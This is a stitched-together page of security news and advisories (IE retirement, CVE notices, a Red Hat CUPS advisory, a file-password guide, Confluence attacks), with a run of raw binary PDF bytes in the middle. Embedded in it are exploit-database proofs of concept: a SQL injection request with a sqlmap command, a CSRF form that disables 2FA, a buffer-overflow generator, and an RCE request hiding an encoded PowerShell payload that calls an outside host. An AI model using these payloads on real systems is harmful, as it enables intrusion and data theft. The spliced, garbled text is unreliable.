Microsoft's legacy browser may be dead—but its remnants are not going anywhere, and neither are its lingering security risks.

After years of decline and a final wind-down over the past 13 months, on Wednesday Microsoft confirmed the retirement of Internet Explorer, the company’s long-lived and increasingly notorious web browser. Launched in 1995, IE came preinstalled on Windows computers for almost two decades, and like Windows XP, Internet Explorer became a mainstay—to the point that when it was time for users to upgrade and move on, they often didn’t. And while last week’s milestone will push even more users off the historic browser, security researchers emphasize that IE and its many security vulnerabilities are far from gone.

In the coming months, Microsoft will disable the IE app on Windows 10 devices, guiding users instead to its next-generation Edge browser, first released in 2015. The IE icon will still remain on users’ desktops, though, and Edge incorporates a service called “IE mode” to preserve access to old websites built for Internet Explorer. Microsoft says it will support IE mode through at least 2029. Additionally, IE will still work for now on all supported versions of Windows 8.1, Windows 7 with Microsoft’s Extended Security Updates, and Windows Server, though the company says it will eventually phase IE out in these, too.  

Seven years after the debut of Edge, industry analysis indicates that Internet Explorer may still hold more than half a percent of the total global browser market share. And in the United States, that share may be closer to as much as 2 percent.

“I do think we’ve made progress, and we probably won’t see as many exploits against IE in the future, but we will still have remnants of Internet Explorer for a long time that scammers can take advantage of,” says Ronnie Tokazowski, a longtime independent malware researcher. “Internet Explorer as the browser will be gone, but there are still pieces that exist.”

For something that’s been around as long as IE, backward compatibility is difficult to balance with the desire for a clean slate. “We haven’t forgotten that some parts of the web still rely on Internet Explorer’s specific behaviors and features,” Sean Lyndersay, the general manager of Microsoft Edge Enterprise, wrote in an IE retrospective on Wednesday, pointing to IE mode.

But he added that there was a real need to start over with Edge rather than trying to salvage IE. “The web has evolved and so have browsers,” he wrote last week. “Incremental improvements to Internet Explorer couldn’t match the general improvements to the web at large, so we started fresh.”

Microsoft says it will still support IE’s underlying browser engine, known as “MSHTML,” and it has its eye on versions of Windows still “used in critical environments.” But Maddie Stone, a researcher for Google’s Project Zero vulnerability hunting team, points out that hackers are still exploiting IE vulnerabilities in real-world attacks.

“Since we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we’ve ever tracked, even though Internet Explorer’s market share of web browser users continues to decrease,” she wrote in April, referring to previously unknown vulnerabilities, called zero-days. “Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn’t use Internet Explorer as their internet browser."

In her analysis, Stone particularly noted that while the number of new IE vulnerabilities Project Zero has detected has remained fairly constant, attackers have shifted over the years to increasingly target the MSHTML browser engine through malicious files like tainted Office documents. This could mean that neutering the IE application won’t immediately change attack trends that are already in motion.

Given how difficult it has been to rein in Internet Explorer at all, Microsoft and IE users around the world have certainly come a long way. But for a browser that’s supposed to be dead, IE still very much loads with the living.

The Ghost of Internet Explorer Will Haunt the Web for Years

NHI’s health insurance web service component has insufficient validation for input string length, which can result in heap-based buffer overflow attack. A remote attacker can exploit this vulnerability to flood the memory space reserved for the program, in order to terminate service without authentication, which requires a system restart to recover service.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202112007

CVE ID

CVE-2021-45918

CVSS

7.5 (High)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

影響產品

健保卡網路服務註冊網站供下載受影響版本之平台與相對應MD5 HASH：  
Windows: Setup.zip MD5驗證碼：515BE7DE5BCE446177FEE8A6E0665093  
Mac: NHI.Card.Mac.pkg.zip MD5驗證碼： 42fcc36541e716e23de77d5f325b186a  
Linux(Ubuntu): mLNHIICC\_Setup.Ubuntu.zip MD5驗證碼： 52EACB7CA2B4D0A5A869DF01079BF4D6  
Linux(Fedora): mLNHIICC\_Setup.fedora.zip MD5驗證碼： 52EACB7CA2B4D0A5A869DF01079BF4D6

問題描述

健保卡網路服務元件之特定函式未驗證輸入的字串長度，導致預先保留的記憶體Buffer不足，造成Heap-based Buffer Overflow漏洞，遠端攻擊者不須權限，即可利用該漏洞導致終止服務，須重啟服務才能恢復。

解決方法

至健保卡網路服務註冊網之下載點下載最新版本

漏洞通報者

Yu-Hsiang Lin

公開日期

2022-06-20

CVE-2021-45918: 健保卡網路服務元件 - Heap-based Buffer Overflow

Red Hat Security Advisory 2022-5056-01 - The Common UNIX Printing System provides a portable printing layer for Linux, UNIX, and similar operating systems. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: cups security and bug fix update  
Advisory ID:       RHSA-2022:5056-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5056  
Issue date:        2022-06-15  
CVE Names:         CVE-2022-26691   
=====================================================================

1. Summary:

An update for cups is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The Common UNIX Printing System (CUPS) provides a portable printing layer  
for Linux, UNIX, and similar operating systems.

Security Fix(es):

* cups: authorization bypass when using "local" authorization  
(CVE-2022-26691)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* 30-second delays printing to Windows 2016 server via HTTPS (BZ#2073531)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the cupsd service will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2084321 - CVE-2022-26691 cups: authorization bypass when using "local" authorization

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

aarch64:  
cups-2.2.6-45.el8_6.2.aarch64.rpm  
cups-client-2.2.6-45.el8_6.2.aarch64.rpm  
cups-client-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm  
cups-debugsource-2.2.6-45.el8_6.2.aarch64.rpm  
cups-devel-2.2.6-45.el8_6.2.aarch64.rpm  
cups-ipptool-2.2.6-45.el8_6.2.aarch64.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm  
cups-lpd-2.2.6-45.el8_6.2.aarch64.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm

noarch:  
cups-filesystem-2.2.6-45.el8_6.2.noarch.rpm

ppc64le:  
cups-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-client-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-client-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-debugsource-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-devel-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-ipptool-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-lpd-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm

s390x:  
cups-2.2.6-45.el8_6.2.s390x.rpm  
cups-client-2.2.6-45.el8_6.2.s390x.rpm  
cups-client-debuginfo-2.2.6-45.el8_6.2.s390x.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.s390x.rpm  
cups-debugsource-2.2.6-45.el8_6.2.s390x.rpm  
cups-devel-2.2.6-45.el8_6.2.s390x.rpm  
cups-ipptool-2.2.6-45.el8_6.2.s390x.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.s390x.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.s390x.rpm  
cups-lpd-2.2.6-45.el8_6.2.s390x.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.s390x.rpm

x86_64:  
cups-2.2.6-45.el8_6.2.x86_64.rpm  
cups-client-2.2.6-45.el8_6.2.x86_64.rpm  
cups-client-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-client-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm  
cups-debugsource-2.2.6-45.el8_6.2.i686.rpm  
cups-debugsource-2.2.6-45.el8_6.2.x86_64.rpm  
cups-devel-2.2.6-45.el8_6.2.i686.rpm  
cups-devel-2.2.6-45.el8_6.2.x86_64.rpm  
cups-ipptool-2.2.6-45.el8_6.2.x86_64.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm  
cups-lpd-2.2.6-45.el8_6.2.x86_64.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
cups-2.2.6-45.el8_6.2.src.rpm

aarch64:  
cups-client-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm  
cups-debugsource-2.2.6-45.el8_6.2.aarch64.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm  
cups-libs-2.2.6-45.el8_6.2.aarch64.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm

ppc64le:  
cups-client-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-debugsource-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-libs-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm

s390x:  
cups-client-debuginfo-2.2.6-45.el8_6.2.s390x.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.s390x.rpm  
cups-debugsource-2.2.6-45.el8_6.2.s390x.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.s390x.rpm  
cups-libs-2.2.6-45.el8_6.2.s390x.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.s390x.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.s390x.rpm

x86_64:  
cups-client-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-client-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm  
cups-debugsource-2.2.6-45.el8_6.2.i686.rpm  
cups-debugsource-2.2.6-45.el8_6.2.x86_64.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm  
cups-libs-2.2.6-45.el8_6.2.i686.rpm  
cups-libs-2.2.6-45.el8_6.2.x86_64.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-26691  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqod69zjgjWX9erEAQiQ3A/+LM9m2kXeWz8N2fXRG00WuByQeTpYA3wO  
InBeSzoVT+hb82gPL2BLGVdHQlVfXo/wYN64e33Llkd/X8EEJ139Hn+Unjh0zdUR  
5lL8qmhx3SIujq/F8nHnCsvodBMDtwdbRH70AHrFFlUWYtmyPb5ZmlrUUp/q0gF4  
VQ6oTMRK1RxL71R1ltRAQIu/V/+J8N3j461JSfbI4Y1jzYScChQ2C2p/sKzYJHzn  
qwOHjGqExXDQb0MsSBk3RNreuIlMHU6e4Q6nFNwkJQR6Jfdcwm4iR58i9YAMannx  
/s/OXDn8UoSKqJF4TlD1rMDgWapoKtbtVlRR1fE8BhZ/QUAKPa8ky9HKY+0lSeBu  
xgDuP7UKwFcLV33d1hJd+HgXXj7GspXcrYkE9+VqXAMYh6RVJR/FDpif9kIg3buO  
+yaGEa0wLE4cdykMMk5yDK7dnm59a8GcIZPjLBroC4u2TlTShphoiiyFfjogaPC1  
ZEj2zCLF4nJARYe/m//Sn8Gjg2S/14of7Gr8z1Kehw/0BT+HCzlx/oMh/jJM0PEm  
ExyULWcsmLRrP3VUM8beBCE86Brdq934SpRc8H2QP6Pjj/GxHG9SR6TMZkkMTaNt  
jQcsKd7igS3Q7oEXLNcaNXG31b7eNvWVuJtLL3PMTucSEqSlyXjEXMSDcTrP5aeR  
Zk1KcaJsJpQ=  
=ONyE  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5056-01

An issue was discovered in TitanFTP (aka Titan FTP) NextGen before 1.2.1050. When installing, Microsoft SQL Express 2019 installs by default with an SQL instance running as SYSTEM with BUILTIN\Users as sysadmin, thus enabling unprivileged Windows users to execute commands locally as NT AUTHORITY\SYSTEM, aka NX-I674 (sub-issue 2).

%PDF-1.4 %���� 3 0 obj <> stream ����JFIFxx��ZExifMM\*JQQtQs������C��C��@�"�� ���}!1AQa"q2���#B��R��$3br� %&'()\*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������� ���w!1AQaq"2�B���� #3R�br� $4�%�&'()\*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������?�1���o?�G����<{��7���

CVE-2022-34006

Virtua Software Cobranca version 12S suffers from a remote SQL injection vulnerability.

    # Exploit Title: Virtua Software Cobranca 12S - SQLi# Shodan Query: http.favicon.hash:876876147# Date: 13/08/2021# Exploit Author: Luca Regne# Vendor Homepage: https://www.virtuasoftware.com.br/# Software Link: https://www.virtuasoftware.com.br/downloads/Cobranca12S_13_08.exe# Version: 12S# Tested on: Windows Server 2019# CVE : CVE-2021-37589------------------------------------------------------------------------## Description A Blind SQL injection vulnerability in a Login Page (/controller/login.php) in Virtua Cobranca 12S version allows remote unauthenticated attackers to get information about application executing arbitrary SQL commands by idusuario parameter. ## Request PoC```POST /controller/login.php?acao=autenticar HTTP/1.1Host: redacted.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 37Connection: closeCookie: origem_selecionado=; PHPSESSID=idusuario='&idsenha=awesome_and_unprobaly_password&tipousr=Usuario```This request causes an error 500. Changing the idusuario to "'+AND+'1'%3d'1'--" the response to request was 200 status code with message of authentication error. ```POST /controller/login.php?acao=autenticar HTTP/1.1Host: redacted.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 37Connection: closeCookie: origem_selecionado=; PHPSESSID=idusuario='+AND+'1'='1'--&idsenha=a&tipousr=Usuario```## ExploitSave the request from burp to file ```bashpython3 sqlmap.py -r ~/req-virtua.txt -p idusuario --dbms firebird --level 5 --risk 3 --random-agent```

Virtua Software Cobranca 12S SQL Injection

Marval MSM version 14.19.0.12476 suffers from a cross site request forgery vulnerability.

    # Exploit Title: Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)# Date: 27/5/2022# Exploit Author: Momen Eldawakhly (Cyber Guy)# Vendor Homepage: https://www.marvalnorthamerica.com/# Software Link: https://www.marvalnorthamerica.com/# Version: v14.19.0.12476# Tested on: Windows# PoCs: https://drive.google.com/drive/folders/1Zy5Oa-maLo0ACfLz90uvxqxwG18DwAZY# 2FA Bypass:<html>  <body>    <form action="https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptHandler.ashx?method=DisableTwoFactorAuthentication&classPath=%2FMSM_Test%2FRFP%2FForms%2FProfile.aspx&classMode=WXr8G2r3eh3984wn3YQvtybzSUW%2B955Uiq5AACvfimwA%2FNZHYRFm8%2Bgidv5CcNfjtLsElRbK%2FRmwvfE9UfeyD6DseGEe5eZGWB32FOJrhdcEh7oNUSSO9Q%3D%3D" method="POST" enctype="text/plain">      <input type="submit" value="Submit request" />    </form>  </body></html>

Marval MSM 14.19.0.12476 Cross Site Request Forgery

Kitty version 0.76.0.8 suffers from a buffer overflow vulnerability.

    # Exploit Title: Kitty 0.76.0.8 Stack Buffer Overflow# Discovered by: Yehia Elghaly# Discovered Date: 2022-06-08# Vendor Homepage: http://www.9bis.net/kitty/index.html#!index.md# Software Link : https://www.fosshub.com/KiTTY.html?dwl=kitty_portable-0.76.0.8.exe# Tested Version: 0.76.0.8# Vulnerability Type: Buffer Overflow# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64# Description: Kitty 0.76.0.8 Stack Buffer Overflow# Steps to reproduce:# 1. - Run the python script and it will create exploit.txt file.# 3. - Kitty 0.76.0.8# 4. - Sessions -> Save# 5. - Paste the characters of txt to Saved/Sessions then click save# 6. - Crashed# Note: ECX Overwwrite #!/usr/bin/pythonexploit = 'A' * 2091try:     file = open("exploit.txt","w")    file.write(exploit)    file.close()    print("POC is created")except:    print("POC not created")

Kitty 0.76.0.8 Stack Buffer Overflow

Marval MSM version 14.19.0.12476 suffers from a remote code execution vulnerability.

    # Exploit Title: Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)# Date: 27/5/2022# Exploit Author: Momen Eldawakhly (Cyber Guy)# Vendor Homepage: https://www.marvalnorthamerica.com/# Software Link: https://www.marvalnorthamerica.com/# Version: v14.19.0.12476# Tested on: Windows# Detailed blog: https://cyber-guy.gitbook.io/cyber-guy/blogs/marval-msm-rcePOST /MSM_Test/RFP/Forms/ScriptHandler.ashx?method=ProcessScript&classPath=%2FMSM_Test%2FRFP%2FForms%2FScriptMaintenance.aspx&classMode=WXr8G2r3eh0wvNjbiIT6aYVgZATjWlaZW0UFQrQrcAku4qWefyYTUu%2BzULTTON0fQaLjNtnCW7VX%2Fj1rYPDpKKN%2F8HPLGRSpVbdvPaR4mPIrSr4Aj22VMuIDEkMTpPhoq3gX8p4TBir56GBTJcpLv1agwKPB%2BWI%2F2TlU%2FjQKzz0%3D HTTP/2Host: MSMHandler.ioCookie: ASP.NET_SessionId=arrsgikvbwbagdsvetfvphbu; appNameAuth=B3D1490922B24585684E139359F3BB93D8D92468A906B1FEA01EB4CF760A23DC90BF30327784677BBC00C5860C145602EF39BB9BEBB6A451E57DBF42C47B7D0CDE09F4CE15D2A5BEBFFCE5A7BFCF7DED8D8B17036F2BCE3DDA873B542EED614B9B42E4B5E4AA18BBE32CC0EB864E6825C898A2F465A42E871DF13F19845E171697D5E23688EAD29D3F6B221DBF18002DE5B929DBA88D42B4B518BC95F5BC5F3A3D36722FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: application/json, text/javascript, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestContent-Length: 456Origin: https://MSMHandler.ioDnt: 1Referer: https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptMaintenance.aspx?id=3Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstype=%221%22&content=%22%5Cn%5CnFunction+Pwn()%5Cn++Set+shell+%3D+CreateObject(%5C%22wscript.Shell%5C%22)%5Cn%5Cn%5Cn++++shell.run+%5C%22powershell.exe+-nop+-w+hidden+-E+%5C%22%5C%22JAB2AGEAcgA9AGgAbwBzAHQAbgBhAG0AZQA7AG4AcwBsAG8AbwBrAHUAcAAgAGsAcgBmADUAbAB2AGYANABzAGUAdABtAGoAMgB2AG4AZABiADUAOQBsADQAdgBtAGcAZABtADUAawB0ADkALgAkAHYAYQByAC4AbwBhAHMAdABpAGYAeQAuAGMAbwBtAA%3D%3D%5C%22%5C%22%5C%22%5Cn%5Cn%5CnEnd+Function%5Cn%5CnPwn%22&id=%2226%22&isCi=true

Marval MSM 14.19.0.12476 Remote Code Execution

Put a digital lock on your most important data.

You never know when one of your files might reach someone it wasn't intended to reach—perhaps through an email forward, a USB stick left behind on a desk, or maybe even an unauthorized user accessing your computer.

Should that happen, password protection is all that stands between your data and the people whom you don't want to see it. It's an extra layer of security you can add to your most sensitive files without too much trouble.

How you go about this will depend on the software you're using to create the file in the first place. Some applications have password protection features built in, while in other cases you'll need to lock up your files using a different method.

Microsoft Word, Excel, and PowerPoint

Adding a password to a document in Word.

Microsoft Word via David Nield

In Word, Excel, or PowerPoint for Windows, open the file you want to protect with a password, then select **File** and **Info**. You should see a Protect option at the top of the next list: Click this button, choose **Encrypt with Password**, and type out your password.

Passwords can be up to 15 characters long and are case-sensitive, so double-check what you're typing in. If you forget the password for a document, spreadsheet, or presentation, you won't be able to get back into it—you'll have to start again from scratch.

If you're using Office on macOS, the process is slightly different: Open the **Review** tab in the ribbon menu at the top, then click the **Protect** button to enter a password. (The button will be labeled slightly differently depending on which program you're in.)

Google Docs, Sheets, and Slides

Sharing a document in Google Docs.

Google Docs via David Nield

There's no password protection feature as such in Google Drive, because your files are already protected by a password: The password linked to your Google account that you use to log in and view your documents, spreadsheets, and presentations.

If you choose to share a file from Google Docs, Sheets, or Slides—via the big **Share** button in the top-right corner when you're working on something—you can either invite specific users to see it (via their email addresses) or generate a link that anyone can use.

We'd recommend the former option (inviting individual users) for maximum security. This means they'll need to log in with their own Google account password—another layer of password protection—before being able to view the file you've shared.

Apple Pages, Numbers, and Keynote

Setting a password on a document in Apple Pages.

Apple Pages via David Nield

If it's the Apple office applications that you're using, the process of adding a password couldn't be much easier. With the file open in Pages, Numbers, or Keynote, select **File** and then **Set Password** to choose and apply your password.

The same warning applies as it does with Microsoft Office—if you can't remember your password then you're not going to be able to get back into your document, spreadsheet, or presentation (otherwise hackers would be able to get in as well).

Note the **Open with Touch ID** checkbox on the password dialog. This gives you the option of using a Touch ID–enabled keyboard on macOS to open your own protected files, saving you the trouble of typing out a password each time.

Protecting Other Files

Adding password protection to a folder on Dropbox.

Dropbox via David Nield

We can't cover every application out there in terms of password protection, but if you dig around in the programs that you're using you might find that they offer this form of additional security while saving files.

If not, you've still got a few options. Keeping files in cloud storage lockers (like Google Drive) is one option: The act of sharing files on these services usually requires a username and password to log in, so your files are kept safe in that way.

Sometimes there are extra features. In the case of Dropbox, for example, on the folder-sharing pane on the web, you can click **Settings** and then change **Who has access** to **People with password**—so both a unique URL and a password are required for access.

If you need another option, create a password-protected archive containing the file or files that you need to keep safe. 7-Zip is a free tool for Windows that is able to build password-protected archives, for example.

Should your files be on an external hard drive, you can encrypt the entire drive and add a password to guard against unwanted access: In Windows, right-click on the drive in File Explorer and choose **Turn on BitLocker**; on macOS, go through the Disk Utility.

Third-party applications such as VeraCrypt (free for both Windows and macOS) are also able to encrypt drives for you, adding password protection at the same time. It's a sensible choice if you're putting sensitive data on a portable storage device.

How to Password Protect Any File

A recently patched critical security flaw in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads.
In at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a crypto miner called z0miner

A recently patched critical security flaw in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads.

In at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a crypto miner called z0miner on victim networks.

The bug (CVE-2022-26134, CVSS score: 9.8), which was patched by Atlassian on June 3, 2022, enables an unauthenticated actor to inject malicious code that paves the way of remote code execution (RCE) on affected installations of the collaboration suite. All supported versions of Confluence Server and Data Center are affected.

Other notable malware pushed as part of disparate instances of attack activity include Mirai and Kinsing bot variants, a rogue package called pwnkit, and Cobalt Strike by way of a web shell deployed after gaining an initial foothold into the compromised system.

"The vulnerability, CVE-2022-26134, allows an attacker to spawn a remotely-accessible shell, in-memory, without writing anything to the server's local storage," Andrew Brandt, principal security researcher at Sophos, said.

The disclosure overlaps with similar warnings from Microsoft, which revealed last week that "multiple adversaries and nation-state actors, including DEV-0401 and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134."

DEV-0401, described by Microsoft as a "China-based lone wolf turned LockBit 2.0 affiliate," has also been previously linked to ransomware deployments targeting internet-facing systems running VMWare Horizon (Log4Shell), Confluence (CVE-2021-26084), and on-premises Exchange servers (ProxyShell).

The development is emblematic of an ongoing trend where threat actors are increasingly capitalizing on newly disclosed critical vulnerabilities rather than exploiting publicly known, dated software flaws across a broad spectrum of targets.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows